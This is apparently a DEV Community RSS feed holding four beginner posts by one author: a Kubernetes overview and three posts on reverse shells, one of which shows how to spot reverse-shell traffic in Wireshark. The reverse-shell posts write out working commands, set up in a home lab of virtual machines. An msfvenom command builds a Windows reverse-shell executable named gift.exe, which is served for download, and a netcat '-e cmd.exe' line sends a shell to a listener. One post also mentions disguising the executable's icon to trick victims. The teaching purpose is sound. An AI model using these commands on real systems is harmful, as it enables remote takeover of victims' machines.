<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:dc="http://purl.org/dc/elements/1.1/">
  <channel>
    <title>DEV Community: Kalaimani</title>
    <description>The latest articles on DEV Community by Kalaimani (@kalaimani_solarc).</description>
    <link>https://dev.to/kalaimani_solarc</link>
    <image>
      <url>https://media2.dev.to/dynamic/image/width=90,height=90,fit=cover,gravity=auto,format=auto/https:%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Fuser%2Fprofile_image%2F836346%2F938ade93-91e7-4dd2-9a4b-0ddfe396103f.jpg</url>
      <title>DEV Community: Kalaimani</title>
      <link>https://dev.to/kalaimani_solarc</link>
    </image>
    <atom:link rel="self" type="application/rss+xml" href="https://dev.to/feed/kalaimani_solarc"/>
    <language>en</language>
    <item>
      <title>Kubernetes Overview</title>
      <dc:creator>Kalaimani</dc:creator>
      <pubDate>Sun, 22 Sep 2024 09:07:57 +0000</pubDate>
      <link>https://dev.to/kalaimani_solarc/kubernetes-overview-5f07</link>
      <guid>https://dev.to/kalaimani_solarc/kubernetes-overview-5f07</guid>
      <description>&lt;p&gt;This is first of a series of bite sized posts about Kubernetes technology in simple terms, targeted for beginners, especially for application developers. Here we don't focus much on Kubernetes cluster administration.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Kubernetes&lt;/strong&gt; is an open-source container orchestration platform.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Container&lt;/strong&gt; is an virtually isolated application process along with its runtime environment. Container is created from its image.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Container image&lt;/strong&gt; is a portable bundle of an application along with all its runtime dependencies.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Container orchestration&lt;/strong&gt; is managing containers workloads at large scale, with the help of container runtimes. Some examples of container orchestration platforms are Kubernetes, Docker Swarm and Hashicorp Nomad.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Container runtime&lt;/strong&gt; is service that manages execution lifecycle of the containers. Examples of container runtimes are CRI-O, Dockerd, Containerd, etc..&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Why Kubernetes?&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Automatically brings current state of the application workload to desired state of deployment.&lt;/li&gt;
&lt;li&gt;Efficiently allocate resources to application workloads.&lt;/li&gt;
&lt;li&gt;It can horizontal scale itself as well as the application work loads.&lt;/li&gt;
&lt;li&gt;It can automatically recover the applications from node failures.&lt;/li&gt;
&lt;li&gt;It has builtin components for service discovery and load balancing.&lt;/li&gt;
&lt;li&gt;Provides networking with both IPv4 and IPv6.&lt;/li&gt;
&lt;li&gt;Provides storage abstractions which can be backed by various types of storage systems such as EBS, EFS, FSx, S3, and more..&lt;/li&gt;
&lt;li&gt;Offers builtin Secret and configuration management.&lt;/li&gt;
&lt;li&gt;Supports Batch execution workloads.&lt;/li&gt;
&lt;li&gt;It is extensible though plugins.&lt;/li&gt;
&lt;/ul&gt;

</description>
      <category>kubernetes</category>
      <category>cloudnative</category>
      <category>containers</category>
      <category>backend</category>
    </item>
    <item>
      <title>Creating reverse shell binary</title>
      <dc:creator>Kalaimani</dc:creator>
      <pubDate>Sun, 27 Mar 2022 16:34:12 +0000</pubDate>
      <link>https://dev.to/kalaimani_solarc/creating-reverse-shell-binary-34i8</link>
      <guid>https://dev.to/kalaimani_solarc/creating-reverse-shell-binary-34i8</guid>
      <description>&lt;p&gt;So far we have played only with &lt;code&gt;nectat&lt;/code&gt; in command line in order to understand reverse shell. Now we are going to go just one step further close to real world by creating an executable binary of a reverse shell. &lt;/p&gt;

&lt;p&gt;For this we need &lt;code&gt;msfvenom&lt;/code&gt; which is part of Metasploit Framework. It comes preinstalled with Kali Linux, if you are going to use some other operating system, there is a very good &lt;a href="https://docs.rapid7.com/metasploit/installing-the-metasploit-framework/" rel="noopener noreferrer"&gt;official guide here&lt;/a&gt; for how to install Metasploit in different OS. In my case the victim machine runs on Windows 10 and the attack machine runs on Xubuntu 20.04. Both are virtual machines.&lt;/p&gt;

&lt;p&gt;One important thing to do before this experiment, you will have to turn off the firewall in your attacker machine. Victim machine's firewall mostly won't block any outbound connections. In case you are getting any issues, turn that one off as well. There are techniques to bypass the firewalls and IDS/IPS, but we are going to keep things simple for now by turning off the firewall.&lt;/p&gt;

&lt;p&gt;First open up a terminal in your attack machine and run the following command.&lt;/p&gt;

&lt;p&gt;&lt;code&gt;msfvenom -p windows/shell_reverse_tcp LHOST=&amp;lt;attack-machine ip&amp;gt; LPORT=&amp;lt;attack-machine port&amp;gt; -f exe &amp;gt; gift.exe&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;It should generate gift.exe in your current directory. Then run the following command to spin up a http server so that gift.exe can be downloaded into the victim machine.&lt;/p&gt;

&lt;p&gt;&lt;code&gt;python3 -m http.server&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fhvrr9klenpjna3jdjqvn.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fhvrr9klenpjna3jdjqvn.png" alt="Image description"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Now open up the browser in the victim machine and go to &lt;a href="http://attack-machine-ip:8000" rel="noopener noreferrer"&gt;http://attack-machine-ip:8000&lt;/a&gt; and click the link to gift.exe and click the keep button on the pop-up to proceed the download.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F0imytf328saohpdh049i.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F0imytf328saohpdh049i.png" alt="Image description"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;After the download you can stop the http server in your attack machine by pressing &lt;code&gt;CTL+C&lt;/code&gt; and then run the following command to spin up the &lt;code&gt;netcat&lt;/code&gt; instance in listener mode.&lt;/p&gt;

&lt;p&gt;&lt;code&gt;nc -l -p 8989&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;Now you can open the gift.exe and it will run on the background and you won't notice any change in you screen. &lt;/p&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fh54w8tszli77ddl94h9u.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fh54w8tszli77ddl94h9u.png" alt="Image description"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Note that I have moved the gift.exe to my Desktop and ran it from there just for clarity, but you can run it from anywhere in your victim machine. Now you can go to your attack machine and see that you have got a reverse shell to play with..&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fjhjn8mqfmtajvz95gqbg.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fjhjn8mqfmtajvz95gqbg.png" alt="Image description"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;In real world, Attacker might change the logo of the executable to trick you to believe as if it is just a document or some other file as the extensions are hidden in Windows by default.&lt;/p&gt;

&lt;p&gt;I hope you find this post useful. See you on next one..&lt;/p&gt;

</description>
      <category>cybersecurity</category>
      <category>malware</category>
      <category>reverseshell</category>
      <category>metasploit</category>
    </item>
    <item>
      <title>Sniffing the Reverse Shell</title>
      <dc:creator>Kalaimani</dc:creator>
      <pubDate>Fri, 25 Mar 2022 11:29:48 +0000</pubDate>
      <link>https://dev.to/kalaimani_solarc/sniffing-the-reverse-shell-2hnc</link>
      <guid>https://dev.to/kalaimani_solarc/sniffing-the-reverse-shell-2hnc</guid>
      <description>&lt;p&gt;This is a follow up of my previous post &lt;a href="https://dev.to/indominus_rem/glimpse-of-reverse-shell-3n4n"&gt;Glimpse of Reverse Shell&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Now we are going to see how the reverse shell's network traffic looks like using the Wireshark.&lt;/p&gt;

&lt;p&gt;First start Wireshark (assuming that you have already installed it in your machine) and click the capture button after selecting your targeted network interface (in my case I have only one "Ethernet").&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fnvl6qpq4i37kvy2k5xaw.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fnvl6qpq4i37kvy2k5xaw.png" alt="Image description"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Then follow the steps from &lt;a href="https://dev.to/indominus_rem/glimpse-of-reverse-shell-3n4n"&gt;Glimpse of Reverse Shell&lt;/a&gt; and type any command in the reverse shell. It will generate some network and it will show up on the WireShark at midst of other network activities. &lt;/p&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fqsbmcoeddfdbfyb77ahn.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fqsbmcoeddfdbfyb77ahn.png" alt="Image description"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;In our case we know the destination port is 8989, so we can apply it as filter like this,&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fnsybl6gkqjc077f29ks7.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fnsybl6gkqjc077f29ks7.png" alt="Image description"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Then we can follow the TCP stream of the filtered traffic&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fph8s8m44sr48f1qsw6bp.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fph8s8m44sr48f1qsw6bp.png" alt="Image description"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Finally we get see the result of the command that have executed remotely&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ff28mccosp8fdoads92fa.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ff28mccosp8fdoads92fa.png" alt="Image description"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Again it is very beginner level demonstration of how to look for network traffic of a naive reverse shell. In real world scenario it would be complicated to varying degrees. For example the network traffic might be encrypted or the data might be obfuscated. I hope this helps you to get some basic understanding of the reverse shell's traffic..&lt;/p&gt;

</description>
      <category>cybersecurity</category>
      <category>malware</category>
      <category>reverseshell</category>
      <category>wireshark</category>
    </item>
    <item>
      <title>Glimpse of Reverse Shell</title>
      <dc:creator>Kalaimani</dc:creator>
      <pubDate>Fri, 25 Mar 2022 09:06:31 +0000</pubDate>
      <link>https://dev.to/kalaimani_solarc/glimpse-of-reverse-shell-3n4n</link>
      <guid>https://dev.to/kalaimani_solarc/glimpse-of-reverse-shell-3n4n</guid>
      <description>&lt;p&gt;Reverse shell is connection that originates from victim machine to attacker machine as result of malware infection or a vulnerability exploitation.&lt;/p&gt;

&lt;p&gt;But you can get glimpse of how reverse shell works without exploiting or infecting a machine with simple netcat command. here how it works..&lt;/p&gt;

&lt;p&gt;First run the following command on the remote system. The &lt;code&gt;-l&lt;/code&gt; option sets the netcat on listening mode.&lt;/p&gt;

&lt;p&gt;&lt;code&gt;nc -l -p &amp;lt;port to listen on&amp;gt;&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/cdn-cgi/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fi1czafe2gacv35ijk6hq.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/cdn-cgi/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fi1czafe2gacv35ijk6hq.png" alt="Image description" width="" height=""&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;And then run this command on victim machine. The &lt;code&gt;-e&lt;/code&gt; option binds the standard input and output of a &lt;code&gt;cmd.exe&lt;/code&gt; instance to netcat socket which is about to establish a connection to the remote machine.&lt;/p&gt;

&lt;p&gt;&lt;code&gt;nc &amp;lt;remote ip&amp;gt; &amp;lt;remote port&amp;gt; -e cmd.exe&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/cdn-cgi/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fdorov28flqsgapi512z1.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/cdn-cgi/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fdorov28flqsgapi512z1.png" alt="Image description" width="" height=""&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Et voilà.. You get a remote shell and you can type commands to get the results on the other end&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/cdn-cgi/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fyj0vjbw8aku85259xeza.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/cdn-cgi/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fyj0vjbw8aku85259xeza.png" alt="Image description" width="" height=""&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;More or less malware and exploits do something similar but in stealthy way. I hope this helps you as beginner how reverse shell works..&lt;/p&gt;

</description>
      <category>reverseshell</category>
      <category>netcat</category>
      <category>cybersecurity</category>
      <category>malware</category>
    </item>
  </channel>
</rss>
